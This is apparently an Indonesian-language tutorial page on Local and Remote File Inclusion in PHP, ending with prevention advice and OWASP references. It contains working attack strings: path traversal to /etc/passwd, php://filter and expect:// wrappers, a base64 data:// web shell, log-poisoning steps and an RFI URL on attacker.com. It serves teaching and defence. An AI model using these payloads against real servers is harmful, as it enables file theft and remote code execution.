Home Pelajaran Web Security Local & Remote File Inclusion (LFI/RFI)
Menengah 25 min Web Security

Local & Remote File Inclusion (LFI/RFI)

LFI: membaca file sensitif di server (/etc/passwd, source code). RFI: mengeksekusi kode dari server remote. LFI to RCE techniques.

File Inclusion adalah kerentanan di mana aplikasi web meng-include file berdasarkan input pengguna. Ada dua jenis: LFI (Local File Inclusion) membaca file lokal server, dan RFI (Remote File Inclusion) mengeksekusi kode dari URL remote. Dampaknya bisa sangat parah: dari information disclosure hingga Remote Code Execution (RCE).

Local File Inclusion (LFI)

Terjadi ketika aplikasi menggunakan fungsi seperti include() atau require() dengan path yang bisa dimanipulasi pengguna.

PHP (Rentan LFI)
$page = $_GET["page"];
include("pages/" . $page . ".php");

Path Traversal untuk LFI

LFI Payloads
# Akses /etc/passwd
?page=../../../../etc/passwd

# Null byte (PHP < 5.3)
?page=../../etc/passwd%00

# PHP filter (baca source code sebagai base64)
?page=php://filter/convert.base64-encode/resource=index

# PHP wrapper untuk execute
?page=expect://id
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

LFI to RCE

Teknik mengubah LFI menjadi Remote Code Execution:

  • Log Poisoning — injek kode PHP ke access/error log server, lalu include log
  • PHP Sessions — injek ke session file via user-agent, lalu include session file
  • /proc/self/environ — injek payload di User-Agent header
  • php://input — POST data langsung dieksekusi
Log Poisoning LFI→RCE
# 1. Kirim request dengan payload di User-Agent
GET / HTTP/1.1
User-Agent: 

# 2. Include log file
?page=../../var/log/apache2/access.log&cmd=id

Remote File Inclusion (RFI)

Jika allow_url_include=On, penyerang bisa include file dari URL remote.

RFI Attack
# Host file shell.php di server attacker
# Lalu:
?page=http://attacker.com/shell.php

# shell.php berisi:

Cara Mencegah LFI/RFI

  • Hindari input user di include() — gunakan whitelist/mapping
  • Matikan allow_url_include — di php.ini
  • Validasi input ketat — tolak karakter ../ \ ..\ %00
  • Gunakan basename() — ambil hanya nama file, abaikan path
  • Open basedir restriction — batasi akses file PHP

Referensi

  • OWASP File Inclusion: https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
  • PayloadsAllTheThings LFI: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion